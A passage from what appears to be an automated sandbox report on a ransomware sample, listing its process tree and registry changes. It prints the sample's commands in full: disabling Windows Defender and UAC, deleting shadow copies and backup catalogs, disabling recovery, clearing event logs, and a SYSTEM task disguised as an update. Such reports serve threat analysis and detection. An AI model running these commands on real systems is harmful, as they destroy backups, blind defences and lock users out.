7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 104 PID 3060 wrote to memory of 856 3060 cmd.exe 106 PID 3060 wrote to memory of 856 3060 cmd.exe 106 PID 2632 wrote to memory of 3256 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 109 PID 2632 wrote to memory of 3256 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 109 PID 2632 wrote to memory of 3896 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 108 PID 2632 wrote to memory of 3896 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 108 PID 3260 wrote to memory of 1396 3260 cmd.exe 199 PID 3260 wrote to memory of 1396 3260 cmd.exe 199 PID 2632 wrote to memory of 1184 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 180 PID 2632 wrote to memory of 1184 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 180 PID 2988 wrote to memory of 1688 2988 cmd.exe 115 PID 2988 wrote to memory of 1688 2988 cmd.exe 115 PID 3836 wrote to memory of 1072 3836 cmd.exe 157 PID 3836 wrote to memory of 1072 3836 cmd.exe 157 PID 4144 wrote to memory of 1916 4144 cmd.exe 116 PID 4144 wrote to memory of 1916 4144 cmd.exe 116 PID 2496 wrote to memory of 2040 2496 cmd.exe 117 PID 2496 wrote to memory of 2040 2496 cmd.exe 117 PID 2632 wrote to memory of 2272 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 118 PID 2632 wrote to memory of 2272 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 118 PID 4692 wrote to memory of 1704 4692 cmd.exe 120 PID 4692 wrote to memory of 1704 4692 cmd.exe 120 PID 3256 wrote to memory of 3408 3256 cmd.exe 121 PID 3256 wrote to memory of 3408 3256 cmd.exe 121 PID 2632 wrote to memory of 4252 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 122 PID 2632 wrote to memory of 4252 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 122 PID 3896 wrote to memory of 1140 3896 cmd.exe 124 PID 3896 wrote to memory of 1140 3896 cmd.exe 124 PID 1184 wrote to memory of 2880 1184 reg.exe 125 PID 1184 wrote to memory of 2880 1184 reg.exe 125 PID 2632 wrote to memory of 3372 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 126 PID 2632 wrote to memory of 3372 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 126 PID 2272 wrote to memory of 544 2272 cmd.exe 128 PID 2272 wrote to memory of 544 2272 cmd.exe 128 PID 2632 wrote to memory of 2624 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 129 PID 2632 wrote to memory of 2624 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 129 PID 2632 wrote to memory of 2056 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 132 PID 2632 wrote to memory of 2056 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 132 PID 4252 wrote to memory of 1520 4252 cmd.exe 131 PID 4252 wrote to memory of 1520 4252 cmd.exe 131 PID 3372 wrote to memory of 2120 3372 cmd.exe 134 PID 3372 wrote to memory of 2120 3372 cmd.exe 134 PID 2632 wrote to memory of 3892 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 135 PID 2632 wrote to memory of 3892 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 135 PID 2632 wrote to memory of 3536 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 142 PID 2632 wrote to memory of 3536 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 142 PID 2056 wrote to memory of 2960 2056 cmd.exe 139 PID 2056 wrote to memory of 2960 2056 cmd.exe 139 PID 2624 wrote to memory of 4440 2624 cmd.exe 137 PID 2624 wrote to memory of 4440 2624 cmd.exe 137 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe"C:\Users\Admin\AppData\Local\Temp\7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:1396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1184
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3892
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3492
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3804
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3536
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2396
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2424
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:372
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3360
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4432
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe" /F2⤵PID:2976
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe" /F3⤵
- Creates scheduled task(s)
PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2512
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2720
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:432
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4804
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4092
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1436
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
- Modifies registry class
PID:1396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4772
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4312
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1132
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2708
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:7092
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:6240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6308
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:10140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:6888
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:8540
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:288
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5732
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:5700
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2608
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4212
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8388
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:18708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5584
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:11144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6564
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6040
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:11184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:10408
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:11320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:10512
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:15024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:10304
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:11344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:10608
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11188
-
-
-
